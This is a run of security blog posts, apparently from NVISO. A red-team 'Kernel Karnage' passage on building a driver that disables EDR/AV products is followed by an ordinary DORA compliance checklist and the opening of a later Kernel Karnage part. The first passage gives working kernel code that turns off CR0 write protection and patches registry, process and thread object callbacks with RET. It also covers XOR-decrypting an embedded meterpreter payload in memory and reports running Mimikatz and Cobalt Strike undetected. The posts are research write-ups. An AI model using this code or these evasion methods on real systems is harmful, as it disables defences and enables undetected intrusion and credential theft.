for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; pEntry != (PLIST_ENTRY)callbackListHead; pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    auto callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
    CR0_WP_OFF_x64();
    PULONG64 pPointer = (PULONG64)callbackFuncAddr;

    switch (callback) {
      case registry:
        g_CallbackGlobals.RegistryCallbacks[index].patched = true;
        memcpy(g_CallbackGlobals.RegistryCallbacks[index].instruction, pPointer, 8);
        break;
      default:
        return STATUS_NOT_SUPPORTED;
        break;
    }

    *pPointer = (ULONG64)0xC3;
    CR0_WP_ON_x64();
    return STATUS_SUCCESS;
  }
}
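The bookkeeping behind this patch (save 8 bytes, overwrite them, restore later) can be tried out safely on an ordinary byte buffer. The sketch below is a user-mode simulation, not driver code: CallbackStore, PatchCallback() and RestoreCallback() are hypothetical names modelled on the `patched` and `instruction` members used above, and the fixed capacity of 64 follows the array size mentioned earlier.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kMaxCallbacks = 64; // fixed array size, as described above
constexpr std::size_t kSavedBytes   = 8;  // bytes overwritten by the patch

// Hypothetical bookkeeping record for one patched callback.
struct PatchedCallback {
    bool patched = false;
    std::uint8_t instruction[kSavedBytes] = {};
};

struct CallbackStore {
    std::array<PatchedCallback, kMaxCallbacks> entries{};
};

// Save the first 8 bytes of `code`, then overwrite them with RET (0xC3)
// followed by zero bytes, which is what a 64-bit store of 0xC3 produces.
bool PatchCallback(CallbackStore& store, std::size_t index, std::uint8_t* code) {
    if (index >= kMaxCallbacks || store.entries[index].patched)
        return false;
    std::memcpy(store.entries[index].instruction, code, kSavedBytes);
    const std::uint8_t patch[kSavedBytes] = {0xC3};
    std::memcpy(code, patch, kSavedBytes);
    store.entries[index].patched = true;
    return true;
}

// Put the saved bytes back and mark the slot as free again.
bool RestoreCallback(CallbackStore& store, std::size_t index, std::uint8_t* code) {
    if (index >= kMaxCallbacks || !store.entries[index].patched)
        return false;
    std::memcpy(code, store.entries[index].instruction, kSavedBytes);
    store.entries[index].patched = false;
    return true;
}
```

Refusing to patch a slot twice matters here: a second save would capture the already patched bytes and make the original instructions unrecoverable.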

With the registry callbacks patched and taken care of, it’s time to jump the last hurdle, and it’s a big one: object callbacks. Out of all the kernel callbacks, object callbacks definitely gave me the most grief and I still don’t understand them 100%. There is only limited documentation out there and most of it covers object callbacks themselves and how to use them, not how to bypass or disable them. Nonetheless, I found a couple of good resources which I think are worth sharing:

2.1 What is this Object Callbacks black magic?

Object callbacks are called as a result of process / thread / desktop HANDLE operations. They can either be called before the operation takes place (POB_PRE_OPERATION_CALLBACK) or after the operation completes (POB_POST_OPERATION_CALLBACK). A good example is the OpenProcess() API call, which returns an open HANDLE to the target local process object if it succeeds. When OpenProcess() is called, a pre-operation callback can be triggered, and when OpenProcess() returns, a post-operation callback can be triggered.

Object callbacks only work on process objects, thread objects and desktop objects. The most common use case for these object callbacks is to modify the requested access rights to said object. If I were to attach a debugger to an EDR/AV process by using OpenProcess() with the PROCESS_ALL_ACCESS flag, the EDR/AV would most likely use an object callback to change the granted access rights to something like PROCESS_QUERY_LIMITED_INFORMATION to protect itself.
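To illustrate the self-protection pattern just described, here is a small user-mode simulation of what such a pre-operation callback might do with the requested access mask. It is a sketch, not an actual ObRegisterCallbacks() routine: FilterDesiredAccess() and its parameters are hypothetical, while the access-right constants carry the values defined in the Windows SDK.

```cpp
#include <cstdint>

// Access-right values as defined in the Windows SDK (winnt.h).
constexpr std::uint32_t kProcessVmRead                  = 0x0010;   // PROCESS_VM_READ
constexpr std::uint32_t kProcessVmWrite                 = 0x0020;   // PROCESS_VM_WRITE
constexpr std::uint32_t kProcessQueryLimitedInformation = 0x1000;   // PROCESS_QUERY_LIMITED_INFORMATION
constexpr std::uint32_t kProcessAllAccess               = 0x1FFFFF; // PROCESS_ALL_ACCESS (Vista and later)

// Hypothetical pre-operation filter: when a handle to the protected process
// is requested, strip every right except PROCESS_QUERY_LIMITED_INFORMATION.
// Rights are only ever removed from the request, never added.
std::uint32_t FilterDesiredAccess(std::uint32_t targetPid, std::uint32_t protectedPid,
                                  std::uint32_t desiredAccess) {
    if (targetPid != protectedPid)
        return desiredAccess; // not our process: leave the request untouched
    return desiredAccess & kProcessQueryLimitedInformation;
}
```

With this filter, a PROCESS_ALL_ACCESS request against the protected process still yields a handle, but one that can no longer read or write the process memory.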

2.2 Where can I find one for myself?

I’m glad you asked! Turns out they’re a little bit harder to locate. Windows contains a very important structure called OBJECT_TYPE which is defined as:

typedef struct _OBJECT_TYPE {
  LIST_ENTRY TypeList;
  UNICODE_STRING Name;
  PVOID DefaultObject; 
  UCHAR Index;
  ULONG TotalNumberOfObjects;
  ULONG TotalNumberOfHandles;
  ULONG HighWaterNumberOfObjects;
  ULONG HighWaterNumberOfHandles;
  OBJECT_TYPE_INITIALIZER TypeInfo; //unsigned char TypeInfo[0x78];
  EX_PUSH_LOCK TypeLock;
  ULONG Key;
  LIST_ENTRY CallbackList; //offset 0xC8
} OBJECT_TYPE, *POBJECT_TYPE;
OBJECT_TYPE STRUCT

This structure is used to define the process and thread objects, which are the only two object types that allow callbacks on their creation and copying, and is stored in the global variables: **PsProcessType and **PsThreadType. It also contains a linked list entry LIST_ENTRY CallbackList, which points to a CALLBACK_ENTRY_ITEM structure defined as:

typedef struct _CALLBACK_ENTRY_ITEM {
	LIST_ENTRY EntryItemList;
	OB_OPERATION Operations;
	DWORD Active;
	PCALLBACK_ENTRY CallbackEntry;
	POBJECT_TYPE ObjectType;
	POB_PRE_OPERATION_CALLBACK PreOperation; //offset 0x28
	POB_POST_OPERATION_CALLBACK PostOperation; //offset 0x30
	__int64 unk;
} CALLBACK_ENTRY_ITEM, * PCALLBACK_ENTRY_ITEM;

The POB_PRE_OPERATION_CALLBACK PreOperation and POB_POST_OPERATION_CALLBACK PostOperation members contain the function pointers to the registered callback routines.
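The 0x28 and 0x30 offsets follow directly from the field sizes on 64-bit Windows, which can be double-checked with a portable mirror of the structure. In this sketch, pointers are replaced by 64-bit integers so the layout is the same on any platform; the `64`-suffixed type names and ReadField() are made up for this example.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Stand-in for LIST_ENTRY on a 64-bit system: two 8-byte pointers.
struct ListEntry64 {
    std::uint64_t Flink;
    std::uint64_t Blink;
};

// Mirror of CALLBACK_ENTRY_ITEM with fixed-width fields.
struct CallbackEntryItem64 {
    ListEntry64 EntryItemList;   // 0x00
    std::uint32_t Operations;    // 0x10 (OB_OPERATION)
    std::uint32_t Active;        // 0x14
    std::uint64_t CallbackEntry; // 0x18
    std::uint64_t ObjectType;    // 0x20
    std::uint64_t PreOperation;  // 0x28
    std::uint64_t PostOperation; // 0x30
    std::uint64_t unk;           // 0x38
};

static_assert(offsetof(CallbackEntryItem64, PreOperation) == 0x28,
              "pre-operation callback pointer expected at offset 0x28");
static_assert(offsetof(CallbackEntryItem64, PostOperation) == 0x30,
              "post-operation callback pointer expected at offset 0x30");

// Read a 64-bit field at a byte offset from the start of an entry, the
// same way raw pointer arithmetic on a list entry would.
std::uint64_t ReadField(const void* entry, std::size_t offset) {
    std::uint64_t value;
    std::memcpy(&value, static_cast<const std::uint8_t*>(entry) + offset, sizeof(value));
    return value;
}
```

Because EntryItemList is the first member, a pointer to the list entry is also a pointer to the start of the item, which is why the offsets can be applied to the list entry directly.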

2.3 Show me the code!

The above-mentioned global variables **PsProcessType and **PsThreadType can be used to grab a POBJECT_TYPE struct, which contains the LIST_ENTRY CallbackList address at offset 0xC8.

PVOID* FindObRegisterCallbacksListHead(POBJECT_TYPE pObType) {
  //POBJECT_TYPE pObType = *PsProcessType;
	return (PVOID*)((__int64)pObType + 0xc8);
}

The CallbackList address can then be used to enumerate the linked list in a similar manner as the registry callback list and patch the pre- and post-operation callback function pointers. The pre- and post-operation callbacks are located at offsets 0x28 and 0x30 in the CALLBACK_ENTRY_ITEM structure.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)callbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    //grab pre-operation callback function address at offset 0x28
    auto preOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x28);
    if (MmIsAddressValid((PVOID*)preOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)preOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][0].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][0].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
          break;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }

    //grab post-operation callback function address at offset 0x30
    auto postOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x30);
    if (MmIsAddressValid((PVOID*)postOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)postOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][1].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][1].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
          break;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }
  }
}
Interceptor patch object callback
patched process object callback
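The save, patch and restore steps from the loop above can be tried out safely on an ordinary byte buffer. The sketch below is a user-mode illustration only: `PatchRecord`, `PatchWithRet` and `RestoreOriginal` are hypothetical names, loosely modelled on the `patched` and `instruction` fields used in the driver code.

```cpp
#include <cstdint>
#include <cstring>

// Hypothetical bookkeeping record, modelled on the fields used above.
struct PatchRecord {
    bool patched = false;
    std::uint8_t instruction[8] = {};
};

// Save the first 8 bytes at `target`, then overwrite them with 0xC3 (RET)
// followed by seven zero bytes, which is what storing the 64-bit value
// 0xC3 produces on little-endian x64.
inline void PatchWithRet(std::uint8_t* target, PatchRecord& record) {
    std::memcpy(record.instruction, target, sizeof(record.instruction));
    record.patched = true;
    const std::uint8_t patch[8] = {0xC3, 0, 0, 0, 0, 0, 0, 0};
    std::memcpy(target, patch, sizeof(patch));
}

// Put the saved bytes back; returns false if nothing was patched.
inline bool RestoreOriginal(std::uint8_t* target, PatchRecord& record) {
    if (!record.patched) {
        return false;
    }
    std::memcpy(target, record.instruction, sizeof(record.instruction));
    record.patched = false;
    return true;
}
```

Only the first byte matters for execution, since the RET returns before the remaining bytes are reached, but all 8 bytes have to be saved because all 8 are overwritten.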

3. Interceptor vs $vendor2: Round 2

In my previous attempt to bypass $vendor2 and run a meterpreter reverse TCP shell on the compromised system, the attack was detected, but not blocked. My EarlyBird shellcode injector used a staged payload to connect back to the metasploit framework and fetch the meterpreter payload, which then got flagged by $vendor2.

To try and solve this issue, I decided not to use a staged payload, but instead embed the whole meterpreter payload in the binary itself. Since the payload size is around 200,000 bytes, it is impractical at best to embed it as a hexadecimal string, and it would get flagged immediately when any static analysis is performed. Instead, one of my colleagues, Firat Acar, suggested I could embed the payload as an encrypted resource and load and decrypt it at runtime in memory.

The code for this is surprisingly simple:

HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD1), L"payload");
DWORD scSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);

Once the resource is loaded, a function like memcpy() or NtWriteVirtualMemory() can be used to write it to memory. Once that’s done, it can be decrypted in memory using a simple XOR:

void XORDecryptInMemory(const char* key, int keyLen, int dataLen, LPVOID startAddr) {
	BYTE* t = (BYTE*)startAddr;

	for (int i = 0; i < dataLen; i++) {
		t[i] ^= key[i % keyLen];
	}
}
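Because XOR is its own inverse, the same routine both encrypts the resource at build time and decrypts it at runtime. Here is a portable sketch of that round trip; `XorInPlace` is a hypothetical helper name, and it uses standard containers instead of the Windows types above so it builds anywhere.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Portable variant of the routine above (hypothetical name).
// Applying it twice with the same key yields the original data.
inline void XorInPlace(std::vector<std::uint8_t>& data, const std::string& key) {
    if (key.empty()) {
        return;  // avoid a modulo by zero
    }
    for (std::size_t i = 0; i < data.size(); ++i) {
        data[i] ^= static_cast<std::uint8_t>(key[i % key.size()]);
    }
}
```

Calling `XorInPlace(payload, "k3y")` once scrambles the buffer, and calling it a second time with the same key restores it.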

Since my shellcode injector attempts to inject into a remote process, using this decrypt routine will cause a STATUS_ACCESS_VIOLATION exception, since directly accessing the memory of a different process is not allowed. Instead, functions like NtReadVirtualMemory() and NtWriteVirtualMemory() should be used.

However, after testing this approach against $vendor2, the embedded resource got flagged almost immediately. Maybe a better encryption algorithm like RC4 or AES could work, but that also comes with a lot of overhead to implement.

A different solution to this problem might be to fetch the payload remotely using sockets, in an attempt to avoid using higher level APIs like WinINet. For now I reverted to a staged payload embedded as a hexadecimal string.

With the ability to now patch all the kernel callbacks, I decided to try and bypass $vendor2 once more. I disabled its botnet protection module, which inspects network traffic for potential malicious activity, since this is what flagged the meterpreter traffic in the first place. I wanted to see if apart from network packet inspection, $vendor2 would detect the meterpreter payload. However, after testing with an HTTPS implant, the botnet protection did not detect and block the payload.

4. Conclusion

This blogpost concludes patching the kernel callbacks. While there is more functionality to add and more problems to address from kernel space, such as ETW or minifilters, the main goal of sufficiently crippling an EDR/AV product using a kernel driver has been met. Using Interceptor, we can deploy a meterpreter shell or Cobalt Strike Beacon and even run Mimikatz undetected. The next challenge will be to deploy the driver on a target and bypass protections such as Driver Signature Enforcement.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

DORA and ICT Risk Management: how to self-assess your compliance

2 December 2021 at 10:09

TL;DR – In this blogpost, we will give you an introduction to the key requirements associated with the Risk Management Framework introduced by DORA (Digital Operational Resilience Act).

More specifically, throughout this blogpost we will try to formulate an answer to the following questions:

  • What are the key requirements associated with the Risk Management Framework of DORA?
  • What are the biggest challenges associated with these requirements?
  • How can you prepare yourself and what are the actions that you should take to align your organization with the Risk Management Framework requirements?

In the following sections, we will share our thoughts on how to self-assess your compliance on this requirement. Note also that, if this self-assessment checklist is of interest to you, you will be able to find it in Excel format in our GitHub repository, here.

What are the ICT Risk Management requirements?

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

Chapter 2 – Section 1 – Risk management governance

The first part of Chapter 2 addresses the risk management governance requirements. They include, but are not limited to, setting roles and responsibilities of the management body, planning and periodic auditing.

This section states the responsibilities of the management body for the definition, approval and oversight of all arrangements related to the ICT risk management framework.

This section also defines and assigns the role of ICT third party Officer. This position shall be in charge of defining and monitoring all the arrangements concluded with ICT third-party service providers on the use of ICT services.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 4 Governance and organisation
Responsibilities of the management body: The management body shall define, approve, oversee and be accountable for the implementation of all arrangements related to the ICT risk management framework.
ICT third party Officer: The role of ICT third party Officer shall be defined to monitor the arrangements concluded with ICT third-party service providers on the use of ICT services
Training of the management body: The management body shall, on a regular basis, follow specific trainings related to ICT risks and their impact on the operations

Chapter 2 – Section 2 – Risk management framework

The second part of Chapter 2 introduces the ICT risk management framework itself as a critical component of the regulation.

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving, and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus DORA does not impose specific standardization itself.

Before exploring the functions, let’s note that DORA specifies several governance mechanisms around the risk management framework. They include, but are not limited to, setting the objectives of the risk management framework, planning and periodic auditing.

The following table provides a checklist for financial entities to self-assess their compliance on these governance requirements:

Article 5 ICT risk management framework
Protecting physical elements: Entities shall define a well-documented ICT risk management framework which shall include strategies, policies, procedures, ICT protocols and tools which are necessary to protect all relevant physical components and infrastructures
Information on ICT risks: Entities shall minimise the impact of ICT risk by deploying appropriate strategies, policies, procedures, protocols and tools
ISMS: Entities shall implement an information security management system based on recognized international standards
Three lines of defence: Entities shall ensure appropriate segregation of ICT management functions, control functions, and internal audit functions
Review: The ICT risk management framework shall be reviewed at least once a year, as well as upon the occurrence of major ICT-related incidents
Improvement: The ICT risk management framework shall be continuously improved on the basis of lessons derived from implementation and monitoring
Audit: The ICT risk management framework shall be audited on a regular basis by ICT auditors
Remediation: Entities shall define a formal follow-up process for the timely verification and remediation of critical ICT audit findings
ICT risk management framework objectives: The ICT risk management framework shall include the methods to address ICT risk and attain specific ICT objectives

Identification

Financial entities shall identify and classify the ICT-related business functions, information assets and supporting ICT resources based on which risks posed by current cyber threats and ICT vulnerabilities are identified and assessed.

The following table provides a checklist for financial entities to self-assess their compliance on the Identification requirement:

Article 7 Identification
Asset Identification: Entities shall identify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification: Entities shall classify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification Review: Entities shall review as needed, and at least yearly, the adequacy of the classification of the information assets
ICT risks Identification and Assessment: Entities shall identify all sources of ICT risks, and assess cyber threats and ICT vulnerabilities relevant to their ICT-related business functions and information assets.
ICT risks Identification and Assessment Review: Entities shall regularly review the ICT risks Identification and Assessment yearly or upon each major change in the network and information system infrastructure
ICT mapping: Entities shall identify all ICT systems accounts, the network resources and hardware equipment
(a) Entities shall map physical equipment considered critical
(b) Entities shall map the configuration of the ICT assets and the links and interdependencies between the different ICT assets.
ICT third-party service providers identification: Entities shall identify all ICT third-party service providers
(a) Entities shall identify and document all processes that are dependent on ICT third-party service providers
(b) Entities shall identify interconnections with ICT third-party service providers.
ICT third-party service providers identification review: Entities shall regularly review the ICT third-party service providers identification
Legacy ICT systems: Entities shall on a regular basis, and at least yearly, conduct a specific ICT risk assessment on all legacy ICT systems

This ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. Moreover, this ICT risk management framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

What to identify and assess? Well …

  • ICT-related business functions
  • Information assets supporting these functions
  • ICT system configurations
  • Interconnections with internal and external systems
  • Sources of ICT risk
  • All ICT system accounts
  • Network resources and hardware equipment
  • Critical physical equipment
  • All processes dependent on and interconnections with ICT third-party service providers

Protection and Prevention

Financial entities shall (based on the risk assessment) set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT security strategies, policies, procedures and appropriate technologies.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 8 Protection and Prevention
CIA: Entities shall develop and document an information security policy defining rules to protect the confidentiality, integrity and availability of their own and their customers’ ICT resources, data and information assets
Segmentation: Entities shall establish a sound network and infrastructure management using appropriate techniques, methods and protocols including implementing automated mechanisms to isolate affected information assets in case of cyber-attacks
Access privileges: Entities shall implement policies that limit the physical and virtual access to ICT system resources and data and establish to that effect a set of policies, procedures and controls that address access privileges
Authentication mechanisms: Entities shall implement policies and protocols for strong authentication mechanisms and dedicated controls systems to prevent access to cryptographic keys
ICT change management: Entities shall implement policies, procedures and controls for ICT change management including changes to software, hardware, firmware components, system or security changes. The ICT change management process shall be approved by appropriate lines of management and shall have specific protocols enabled for emergency changes.
Patching: Entities shall have appropriate and comprehensive policies for patches and updates

What does this entail?

  • Ensuring the resilience, continuity and availability of ICT systems
  • Ensuring the security, confidentiality and integrity of data
  • Ensuring the continuous monitoring and control of ICT systems and tools
  • Defining and implementing Information security policies such as
    • Limit physical and virtual access to ICT systems
    • Protocols on strong authentication
    • Change management
    • Patching / updates management

Detection

Financial entities shall continuously monitor and promptly detect anomalous activities, threats and compromises of the ICT environment.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 9 Detection
Detect anomalous activities: Entities shall have in place mechanisms to promptly detect anomalous activities
(a) ICT network performance issues
(b) ICT-related incidents
Detect single points of failure: Entities shall have in place mechanisms to identify all potential material single points of failure
Testing: All detection mechanisms shall be regularly tested
Alert mechanism: All detection mechanisms shall enable multiple layers of control
(a) Define alert thresholds
(b) Define criteria to trigger ICT-related incident detection
(c) Define criteria to trigger ICT-related incident response processes
(d) Have automatic alert mechanisms in place for relevant staff in charge of ICT-related incident response.
Trade reports checking: Entities shall have in place systems that can effectively check trade reports for completeness, identify omissions and obvious errors and request re-transmission of any such erroneous reports.

What does this entail?

  • Ensure the prompt detection of anomalous activities
  • Enforce multiple layers of control
  • Enable the identification of single points of failure

Response and recovery (including Backup policies and recovery methods)

Financial entities shall put in place dedicated and comprehensive business continuity policies and disaster and recovery plans to adequately react to identified security incidents and to ensure the resilience, continuity and availability of ICT systems.

The following table provides a checklist for financial entities to self-assess their compliance on Response and recovery requirements:

Article 10 Response and recovery
ICT Business Continuity Policy: Entities shall put in place a dedicated and comprehensive ICT Business Continuity Policy as an integral part of the operational business continuity policy of the entity
ICT Business Continuity Mechanisms: Entities shall implement the ICT Business Continuity Policy through appropriate and documented arrangements, plans, procedures and mechanisms aimed at:
(a) recording all ICT-related incidents;
(b) ensuring the continuity of the entity’s critical functions;
(c) quickly, appropriately and effectively responding to and resolving all ICT-related incidents;
(d) activating without delay dedicated plans that enable containment measures, processes and technologies, as well as tailored response and recovery procedures;
(e) estimating preliminary impacts, damages and losses;
(f) setting out communication and crisis management actions which ensure that updated information is transmitted to all relevant internal staff and external stakeholders, and reported to competent authorities
ICT Disaster Recovery Plan: Entities shall implement an associated ICT Disaster Recovery Plan
ICT Disaster Recovery Audit Review: Entities shall define a process for the ICT Disaster Recovery Plan to be subject to independent audit reviews.
ICT Business Continuity Test: Entities shall periodically test the ICT Business Continuity Policy, at least yearly and after substantive changes to the ICT systems
ICT Disaster Recovery Test: Entities shall periodically test the ICT Disaster Recovery Plan, at least yearly and after substantive changes to the ICT systems
Testing Plans: Entities shall include in the testing plans scenarios of cyber-attacks and switchovers between the primary ICT infrastructure and the redundant capacity, backups and redundant facilities
Crisis Communication Plans: Entities shall implement a crisis communication plan
Crisis Communication Plans Test: Entities shall periodically test the crisis communication plans, at least yearly and after substantive changes to the ICT systems
Crisis Management Function: Entities shall have a crisis management function, which, in case of activation of their ICT Business Continuity Policy or ICT Disaster Recovery Plan, shall set out clear procedures to manage internal and external crisis communications
Records of Activities: Entities shall keep records of activities before and during disruption events when their ICT Business Continuity Policy or ICT Disaster Recovery Plan is activated.
ICT Business Continuity Policy Communication: When implementing changes to the ICT Business Continuity Policy, entities shall communicate those changes to the competent authorities
Test Communication: Entities shall define a process to provide to the competent authorities copies of the results of the ICT business continuity tests
Incident Communication: Entities shall define a process to report to competent authorities all costs and losses caused by ICT disruptions and ICT-related incidents

The following table provides a checklist for financial entities to self-assess their compliance on Backup policies requirements:

Article 11 Backup policies and recovery methods
Backup Policy: Entities shall develop a backup policy
(a) specifying the scope of the data that is subject to the backup
(b) specifying the minimum frequency of the backup
(c) based on the criticality of information or the sensitiveness of the data
Backup Restoration: When restoring backup data using own systems, entities shall use ICT systems that have an operating environment different from the main one, that is not directly connected with the latter and that is securely protected from any unauthorized access or ICT corruption
Recovery Plans: Entities shall develop recovery plans which enable the recovery of all transactions at the time of disruption to allow the central counterparty to continue to operate with certainty and to complete settlement on the scheduled date
Recovery Methods: Entities shall develop recovery methods to limit downtime and disruption
ICT third-party providers Continuity: Entities shall ensure that their ICT third-party providers maintain at least one secondary processing site endowed with resources, capabilities, functionalities and staffing arrangements sufficient and appropriate to ensure business needs
ICT third-party providers secondary processing site: Entities shall ensure that the ICT third-party provider secondary processing site is:
(a) located at a geographical distance from the primary processing site
(b) capable of ensuring the continuity of critical services identically to the primary site
(c) immediately accessible to the entity’s staff to ensure continuity of critical services
Recovery time objectives: Entities shall determine recovery time and point objectives for each function. Such time objectives shall ensure that, in extreme scenarios, the agreed service levels are met
Recovery checks: When recovering from an ICT-related incident, entities shall perform multiple checks, including reconciliations, in order to ensure that the level of data integrity is of the highest level

How to meet the compliance on the Response and Recovery requirements?

  • Define and implement an ICT Business Continuity Policy
  • Define and implement an ICT Disaster Recovery Plan
  • Define and implement backup policies
  • Develop recovery methods
  • Determine flexible recovery time and point objectives for each function

Developing response and recovery strategies and plans adds an additional level of complexity, as it will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

Learning and evolving

Financial entities shall include continuous learning and evolving in the internal processes in the form of information-gathering, as well as post-incident review and analysis.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 12 Learning and evolving
Risk landscape: Entities shall gather information on vulnerabilities and cyber threats, ICT-related incidents, in particular cyber-attacks, and analyse their likely impacts on their digital operational resilience.
Post ICT-related incident reviews: Entities shall put in place post ICT-related incident reviews after significant ICT disruptions of their core activities
(a) analysing the causes of disruption
(b) identifying required improvements to the ICT operations or within the ICT Business Continuity Policy
Post ICT-related incident reviews mechanism: Entities shall ensure the post ICT-related incident reviews determine whether the established procedures were followed and the actions taken were effective
(a) the promptness in responding to security alerts and determining the impact of ICT-related incidents and their severity;
(b) the quality and speed in performing forensic analysis;
(c) the effectiveness of incident escalation within the financial entity;
(d) the effectiveness of internal and external communication
Lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests: Entities shall derive lessons from the ICT Business Continuity and ICT Disaster Recovery tests. Lessons shall be duly incorporated on a continuous basis into the ICT risk assessment process
Lessons learned reporting: Senior ICT staff shall report at least yearly to the management body on the findings derived from the lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests
Monitor the effectiveness of the implementation of the digital resilience strategy: Entities shall map the evolution of ICT risks over time, analyse the frequency, types, magnitude and evolution of ICT-related incidents, in particular cyber-attacks and their patterns, with a view to understand the level of ICT risk exposure and enhance the cyber maturity and preparedness of the entity
ICT security awareness programs: Entities shall develop ICT security awareness trainings as compulsory modules in their staff training schemes
Digital operational resilience training: Entities shall develop ICT digital operational resilience trainings as compulsory modules in their staff training schemes

What does this entail?

  • Ensure information gathering on vulnerabilities and cyber threats
  • Ensure post-incident reviews after significant ICT disruptions
  • Define a procedure for the analysis of causes of disruptions
  • Define a procedure for the reporting to the management body
  • Develop ICT security awareness programs and trainings

Developing ICT security awareness programs and trainings adds another level of complexity: DORA introduces compulsory training on digital operational resilience not only for the management body, but also for the whole staff, as part of their general training package.

Communication

Financial entities shall define a communication strategy, plans and procedures for communicating ICT-related incidents to clients, counterparts and the public.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 13 Communication
Clients and counterparts communication: Entities shall have in place communication plans enabling a responsible disclosure of ICT-related incidents or major vulnerabilities to clients and counterparts as well as to the public, as appropriate.
Staff communication: Entities shall implement communication policies for staff and for external stakeholders.
(a) Communication policies for staff shall take into account the need to differentiate between staff involved in the ICT risk management, in particular response and recovery, and staff that needs to be informed.
Mandate: At least one person in the entity shall be tasked with implementing the communication strategy for ICT-related incidents and fulfil the role of public and media spokesperson for that purpose.

What does this entail?

  • Develop communication plans to communicate to clients, counterparts and the public
  • Mandate at least one person to implement the communication strategy for ICT-related incidents

I hope you found this blogpost interesting.

Keep an eye out for the following parts! This blog post is part of a series. In the following blogposts, we will further explore the requirements associated with the Incident Management process, the Digital Operational Resilience Testing and the ICT Third-Party Risk Management of DORA.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest in IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering.

Find out more about Nicolas on LinkedIn.

Kernel Karnage – Part 5 (I/O & Callbacks)

30 November 2021 at 10:02

After showing Interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2. However, the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting over the functionality from Evil driver to Interceptor and added support for patching image load callbacks as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

.
+-- Driver
|   +-- Header Files
